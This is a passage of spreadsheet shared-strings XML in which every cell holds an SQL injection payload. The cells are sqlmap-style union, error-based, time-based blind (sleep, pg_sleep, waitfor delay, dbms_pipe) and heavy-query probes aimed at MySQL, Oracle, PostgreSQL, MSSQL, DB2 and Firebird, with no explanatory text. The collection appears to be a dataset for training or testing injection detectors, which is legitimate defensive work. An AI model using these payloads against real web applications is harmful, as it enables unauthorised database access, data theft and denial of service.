  </si>
  <si>
    <t>-2225' union all select 1545,1545,1545,1545#</t>
  </si>
  <si>
    <t>1' )  or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 )  and  ( 'vxqs' = 'vxqs</t>
  </si>
  <si>
    <t>1' )  where 1027 = 1027 and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a ) --</t>
  </si>
  <si>
    <t xml:space="preserve">1', ( case when 5204 = 2136 then 1 else null end ) </t>
  </si>
  <si>
    <t>1"  )  )   )  or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 )  and   (  (   ( "fpkm" like "fpkm</t>
  </si>
  <si>
    <t>1" where 1051 = 1051 union all select null--</t>
  </si>
  <si>
    <t>-9725' )  union all select 2481,2481,2481,2481,2481,2481,2481,2481,2481,2481--</t>
  </si>
  <si>
    <t xml:space="preserve"> ( 2329 = 4209 ) *1</t>
  </si>
  <si>
    <t xml:space="preserve">-4615' or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( </t>
  </si>
  <si>
    <t>-1588%"  )  )   )  or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t>1" where 4633 = 4633 and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1%" and  ( select * from  ( select ( sleep ( 5  )  )   ) gcrr ) #</t>
  </si>
  <si>
    <t>1'  )  )   and elt ( 4249 = 4249,7259 )  and   (  (  'miir' like 'miir</t>
  </si>
  <si>
    <t>1' )  and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and  ( 'ohqs' like 'ohqs</t>
  </si>
  <si>
    <t>1'  )  )   as njop where 7001 = 7001</t>
  </si>
  <si>
    <t>-3828%"  )  )   )  or make_set ( 1765 = 8657,8657 )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>-7001'+ ( select slav where 9321 = 9321 union all select 9321,9321,9321,9321,9321,9321,9321,9321,9321--</t>
  </si>
  <si>
    <t>1  )  )   as quap where 7625 = 7625</t>
  </si>
  <si>
    <t>-1171' union all select 3958,3958,3958,3958,3958--</t>
  </si>
  <si>
    <t>1" )  where 1107 = 1107 and 8189 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>-1277" )  where 6622 = 6622 or 3038 = 3038</t>
  </si>
  <si>
    <t>-9558" where 7497 = 7497 or  ( 2539 = 6484 ) *6484--</t>
  </si>
  <si>
    <t>select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (   ( 'atvu' = 'atvu</t>
  </si>
  <si>
    <t>1'+ ( select rdpe where 6553 = 6553 or elt ( 6272 = 6272,sleep ( 5  )  )   ) +'</t>
  </si>
  <si>
    <t>select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 )  from dual and '%' = '</t>
  </si>
  <si>
    <t>-9929' )  as gbtc where 8162 = 8162 or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t>1' )  and 8189 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>-3364%"  )  )   )  union all select 5464--</t>
  </si>
  <si>
    <t>select case when 1613 = 2937 then 1 else null end--</t>
  </si>
  <si>
    <t>select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 )  from dual and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and   (  (  "%" = "</t>
  </si>
  <si>
    <t xml:space="preserve">1" or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) </t>
  </si>
  <si>
    <t>-8410" or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 11</t>
  </si>
  <si>
    <t xml:space="preserve">-1269' or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) </t>
  </si>
  <si>
    <t>1'  )  )   )  and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )  and   (  (   ( 'mfmk' = 'mfmk</t>
  </si>
  <si>
    <t>select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4-- sapi</t>
  </si>
  <si>
    <t xml:space="preserve"> ( case when 2646 = 8520 then 2646 else null end ) </t>
  </si>
  <si>
    <t>-9046'  )  )   as ymqc where 3733 = 3733 union all select 3733,3733,3733,3733,3733,3733,3733--</t>
  </si>
  <si>
    <t>1'+ ( select sfuq where 8094 = 8094 procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1  )  )  +'</t>
  </si>
  <si>
    <t>select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (   ( 6051 = 6051</t>
  </si>
  <si>
    <t>1'  )  )   and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   and   (  (  'foop' like 'foop</t>
  </si>
  <si>
    <t>1'  )  )   procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 )  and   (  (  'asdc' like 'asdc</t>
  </si>
  <si>
    <t>1 )  or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu )  and  ( 7079 = 7079</t>
  </si>
  <si>
    <t>-2397  )  )   as oizy where 1746 = 1746 union all select 1746,1746,1746,1746,1746,1746#</t>
  </si>
  <si>
    <t xml:space="preserve"> end if</t>
  </si>
  <si>
    <t>1" )  as kbjt where 2012 = 2012 and  ( 5978 = 6898 ) *6898--</t>
  </si>
  <si>
    <t>-5771'  )  )   union all select 2833,2833,2833,2833,2833,2833--</t>
  </si>
  <si>
    <t>1" )  where 6478 = 6478 union all select null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>select count ( * )  from generate_series ( 1,5000000 ) --</t>
  </si>
  <si>
    <t>select  ( case when  ( 2716 = 8138 )  then 2716 else 2716* ( select 2716 from mysql.db )  end ) #</t>
  </si>
  <si>
    <t>1'|| ( select 'jlon' where 1461 = 1461</t>
  </si>
  <si>
    <t>-7858' )  union all select 1541,1541,1541,1541,1541,1541#</t>
  </si>
  <si>
    <t>-5313' )  union all select 7187,7187,7187#</t>
  </si>
  <si>
    <t>1'+ ( select qtyi where 7147 = 7147</t>
  </si>
  <si>
    <t>-2378" where 2686 = 2686 or 6872 = 6872--</t>
  </si>
  <si>
    <t>1'  )  )   )  and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and   (  (   ( 'owot' = 'owot</t>
  </si>
  <si>
    <t xml:space="preserve">1 )  or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 ) </t>
  </si>
  <si>
    <t>-9553" )  as geih where 6453 = 6453 or 8453 = 8159--</t>
  </si>
  <si>
    <t>1"  )  )   )  or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and   (  (   ( "adwg" like "adwg</t>
  </si>
  <si>
    <t>-7248' )  where 4626 = 4626 or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t>1" and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and "tjbe" like "tjbe</t>
  </si>
  <si>
    <t>1'+ ( select ophz where 9158 = 9158 rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo  )  )  +'</t>
  </si>
  <si>
    <t>-9532  )  )   union all select 6039,6039,6039,6039--</t>
  </si>
  <si>
    <t>1' )  as rqzz where 4987 = 4987 or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1 or  ( select * from  ( select ( sleep ( 5  )  )   ) sddo ) #</t>
  </si>
  <si>
    <t>-4085'+ ( select aipn where 5493 = 5493 union all select 5493,5493,5493,5493,5493,5493,5493#</t>
  </si>
  <si>
    <t>1" where 5334 = 5334 or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )  --</t>
  </si>
  <si>
    <t>1%"  )  )   union all select null,null,null,null--</t>
  </si>
  <si>
    <t>1 and 8189 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>-1055" or  ( 8459 = 8459 ) *4906 and "kdbr" = "kdbr</t>
  </si>
  <si>
    <t>-7083" or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 11</t>
  </si>
  <si>
    <t>1'+ ( select iutk where 6158 = 6158</t>
  </si>
  <si>
    <t>1' where 9602 = 9602</t>
  </si>
  <si>
    <t>-2110' or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t>-8025" )  or  ( 1436 = 4186 ) *4186 and  ( "sqwv" like "sqwv</t>
  </si>
  <si>
    <t>1' )  as ncou where 9166 = 9166 and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno ) --</t>
  </si>
  <si>
    <t>select  ( case when  ( 3076 = 3596 )  then 3076 else 3076* ( select 3076 from mysql.db )  end ) #</t>
  </si>
  <si>
    <t>1' )  union all select null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1"  )  )   as ltco where 3862 = 3862 or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t xml:space="preserve"> ( select * from  ( select ( sleep ( 5  )  )   ) srmq )  and "wsmz" like "wsmz</t>
  </si>
  <si>
    <t>select  ( case when  ( 3365 = 6236 )  then 3365 else 1/ ( select 0 )  end ) --</t>
  </si>
  <si>
    <t>1"  )  )   as xxdm where 4818 = 4818</t>
  </si>
  <si>
    <t>-2394' )  union all select 1650,1650,1650,1650,1650,1650,1650--</t>
  </si>
  <si>
    <t xml:space="preserve">1', ( select  ( case when  ( 3576 = 7744 )  then 1 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual ) </t>
  </si>
  <si>
    <t>1' )  as wpom where 2620 = 2620 and elt ( 3114 = 3114,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>1 )  as vbli where 5139 = 5139 and 2782 = 2625--</t>
  </si>
  <si>
    <t>1' )  as qaec where 6572 = 6572 or 5356 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>1 )  and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and  ( 5098 = 5098</t>
  </si>
  <si>
    <t>-8071  )  )   or 9160 = 4253</t>
  </si>
  <si>
    <t>1  )  )   as xmac where 7692 = 7692</t>
  </si>
  <si>
    <t>1' )  or elt ( 6272 = 6272,sleep ( 5  )  )   and  ( 'xwsb' = 'xwsb</t>
  </si>
  <si>
    <t>-3443"  )  )   union all select 4043,4043,4043,4043,4043,4043,4043#</t>
  </si>
  <si>
    <t>1'  )  )   as dcen where 5852 = 5852 or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu ) --</t>
  </si>
  <si>
    <t>1" )  as rqpp where 9383 = 9383 or 7417 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>1'  )  )   and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (  'rggg' = 'rggg</t>
  </si>
  <si>
    <t>1 )  and elt ( 1210 = 1210,sleep ( 5  )  )   and  ( 1915 = 1915</t>
  </si>
  <si>
    <t>1 or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c  )  )  #</t>
  </si>
  <si>
    <t>select  ( case when  ( 8820 = 4648 )  then 8820 else 8820* ( select 8820 from information_schema.character_sets )  end ) #</t>
  </si>
  <si>
    <t>1 order by 1--</t>
  </si>
  <si>
    <t xml:space="preserve"> ( select * from  ( select ( sleep ( 5  )  )   ) srmq )  and  ( "vjlr" like "vjlr</t>
  </si>
  <si>
    <t>1%'  )  )   )  or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t xml:space="preserve"> end and   (  (  'vkle' = 'vkle</t>
  </si>
  <si>
    <t>1%' )  or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and  ( '%' = '</t>
  </si>
  <si>
    <t>-4031%" union all select 9566--</t>
  </si>
  <si>
    <t>1" or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )   and "gknn" like "gknn</t>
  </si>
  <si>
    <t>1  )  )   and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and   (  (  5281 = 5281</t>
  </si>
  <si>
    <t>1%'  )  )   procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>1%' and  ( 3020 = 3020 ) *6703 and '%' = '</t>
  </si>
  <si>
    <t>-2291  )  )   or 4067 = 5666#</t>
  </si>
  <si>
    <t>-9736' or make_set ( 7311 = 2067,2067 )  and 'czdt' like 'czdt</t>
  </si>
  <si>
    <t>1" procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 )  and "dsae" = "dsae</t>
  </si>
  <si>
    <t>1%" )  or 2367 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>-7864 or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 1</t>
  </si>
  <si>
    <t>-3964" )  where 3566 = 3566 order by 1--</t>
  </si>
  <si>
    <t>1"  )  )   )  procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 )  and   (  (   ( "tabq" like "tabq</t>
  </si>
  <si>
    <t>1' )  as najc where 5213 = 5213 procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 ) --</t>
  </si>
  <si>
    <t>-6597'+ ( select aewz where 4036 = 4036 union all select 4036,4036,4036,4036,4036,4036,4036--</t>
  </si>
  <si>
    <t>1"  )  )   )  and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )   and   (  (   ( "enfu" = "enfu</t>
  </si>
  <si>
    <t>waitfor delay '0:0:5' and 'dfzn' = 'dfzn</t>
  </si>
  <si>
    <t>1  )  )   )  and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 )  = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>-3169" order by 1#</t>
  </si>
  <si>
    <t>1" rlike sleep ( 5 )  and "veub" = "veub</t>
  </si>
  <si>
    <t>1'+ ( select 'feof' where 1966 = 1966</t>
  </si>
  <si>
    <t>1" )  as gdcx where 2335 = 2335 and 6969 =  ( select 6969 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>select * from generate_series ( 4465,4465,case when  ( 4465 = 6232 )  then 1 else 0 end )  limit 1--</t>
  </si>
  <si>
    <t>-5052  )  )   )  union all select 8351,8351,8351,8351#</t>
  </si>
  <si>
    <t>1"  )  )   )  or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 )  and   (  (   ( "mmsh" = "mmsh</t>
  </si>
  <si>
    <t>1' or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and 'zenl' like 'zenl</t>
  </si>
  <si>
    <t>1'|| ( select 'svgd' from dual where 5188 = 5188 union all select null,null,null,null,null#</t>
  </si>
  <si>
    <t>1  )  )   )  or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )   and   (  (   ( 4510 = 4510</t>
  </si>
  <si>
    <t>-7272" )  union all select 9163,9163,9163,9163,9163,9163,9163--</t>
  </si>
  <si>
    <t>1" and elt ( 8464 = 5761,5761 )  and "ydmt" like "ydmt</t>
  </si>
  <si>
    <t>select benchmark ( 5000000,md5 ( 0x4c4d6142  )  )   and 'gfpd' = 'gfpd</t>
  </si>
  <si>
    <t>1 and  ( 3020 = 3020 ) *6703# syuj</t>
  </si>
  <si>
    <t>-9039' )  union all select 8058,8058,8058,8058,8058--</t>
  </si>
  <si>
    <t xml:space="preserve">iif ( 1157 = 4542,1,1/0 ) </t>
  </si>
  <si>
    <t>select * from generate_series ( 4592,4592,case when  ( 4592 = 4592 )  then 1 else 0 end )  limit 1--</t>
  </si>
  <si>
    <t>1' or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 )  and 'gkku' like 'gkku</t>
  </si>
  <si>
    <t>1' )  where 2208 = 2208 rlike sleep ( 5 ) #</t>
  </si>
  <si>
    <t xml:space="preserve">1 or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) </t>
  </si>
  <si>
    <t>1%'  )  )   )  and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --</t>
  </si>
  <si>
    <t>1"  )  )   and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and   (  (  "gxqq" = "gxqq</t>
  </si>
  <si>
    <t>select  ( case when  ( 9562 = 5996 )  then 1 else 9562* ( select 9562 from master..sysdatabases )  end ) --</t>
  </si>
  <si>
    <t>-9202' where 9799 = 9799 or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118</t>
  </si>
  <si>
    <t xml:space="preserve">begin dbms_lock.sleep ( 5 ) </t>
  </si>
  <si>
    <t>select pg_sleep ( 5 ) -- ojzt</t>
  </si>
  <si>
    <t>1'  )  )   )  or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and   (  (   ( 'xdui' like 'xdui</t>
  </si>
  <si>
    <t>-6529' )  or  ( 4309 = 1601 ) *1601</t>
  </si>
  <si>
    <t>1  )  )   and sleep ( 5 ) #</t>
  </si>
  <si>
    <t>1 where 1299 = 1299</t>
  </si>
  <si>
    <t>1%'  )  )   )  and elt ( 4249 = 4249,7259 )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>-5726%"  )  )   or 6872 = 6872 and   (  (  "%" = "</t>
  </si>
  <si>
    <t>1'  )  )   as ypgz where 8704 = 8704</t>
  </si>
  <si>
    <t>1%"  )  )   and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>-9934" )  or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr (</t>
  </si>
  <si>
    <t>-8513' union all select 7414--</t>
  </si>
  <si>
    <t>-6632 )  union all select 4073,4073,4073,4073,4073,4073,4073,4073--</t>
  </si>
  <si>
    <t>select benchmark ( 5000000,md5 ( 0x4c4d6142  )  )   and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>1' )  and 3560 = 5467--</t>
  </si>
  <si>
    <t>select  ( case when  ( 8331 = 5625 )  then 8331 else 8331* ( select 8331 from mysql.db )  end ) #</t>
  </si>
  <si>
    <t>if ( 5896 = 4251 )  select 5896 else drop function xmyk--</t>
  </si>
  <si>
    <t>1'  )  )   as mqnv where 9831 = 9831</t>
  </si>
  <si>
    <t>1' where 1836 = 1836 or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 )  = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>select case when 2640 = 9249 then 1 else null end--</t>
  </si>
  <si>
    <t>1'|| ( select 'goen' from dual where 8586 = 8586</t>
  </si>
  <si>
    <t>1' where 7036 = 7036</t>
  </si>
  <si>
    <t>1' or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x )  and 'yvzf' = 'yvzf</t>
  </si>
  <si>
    <t xml:space="preserve"> end and "xouo" like "xouo</t>
  </si>
  <si>
    <t>1"  )  )   )  procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 )  and   (  (   ( "ftjg" = "ftjg</t>
  </si>
  <si>
    <t>waitfor delay '0:0:5' and   (  (  'nvqf' = 'nvqf</t>
  </si>
  <si>
    <t>1' )  where 1577 = 1577 union all select null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1%'  )  )   )  and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>1' )  as inid where 7812 = 7812 or 6793 =  ( select 6793 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>1' )  as qcse where 4147 = 4147 waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>1 where 8506 = 8506</t>
  </si>
  <si>
    <t>1%" )  and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 )  = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t xml:space="preserve">1 and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )  </t>
  </si>
  <si>
    <t>1 )  as msat where 1267 = 1267</t>
  </si>
  <si>
    <t xml:space="preserve"> select sleep ( 5 )  and  ( 'dcys' like 'dcys</t>
  </si>
  <si>
    <t>1" )  as rovd where 3764 = 3764 and elt ( 4249 = 4249,7259 ) --</t>
  </si>
  <si>
    <t>1  )  )   )  rlike  ( select  ( case when  ( 4367 = 6879 )  then 1 else 0x28 end  )  )   and   (  (   ( 2542 = 2542</t>
  </si>
  <si>
    <t>1 where 5161 = 5161 and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual ) --</t>
  </si>
  <si>
    <t>1"  )  )   as tgwp where 9405 = 9405</t>
  </si>
  <si>
    <t>-3071  )  )   as uiiu where 8910 = 8910 union all select 8910,8910,8910,8910,8910,8910,8910#</t>
  </si>
  <si>
    <t>1' in boolean mode )  union all select null--</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and  ( "qwdi" = "qwdi</t>
  </si>
  <si>
    <t>1%"  )  )   )  or 1022 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>1' )  as jdmh where 6175 = 6175 rlike sleep ( 5 ) #</t>
  </si>
  <si>
    <t>1'  )  )   and 6969 =  ( select 6969 from pg_sleep ( 5  )  )   and   (  (  'prjf' = 'prjf</t>
  </si>
  <si>
    <t>1'  )  )   )  or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 )  and   (  (   ( 'xwhi' = 'xwhi</t>
  </si>
  <si>
    <t>1" )  where 1001 = 1001 procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75  )  )    )  )   ) ,1 ) #</t>
  </si>
  <si>
    <t>1"  )  )   union all select null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t xml:space="preserve">-7532  )  )   )  or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 </t>
  </si>
  <si>
    <t>select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and  ( '%' = '</t>
  </si>
  <si>
    <t>1%"  )  )   )  or 4915 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
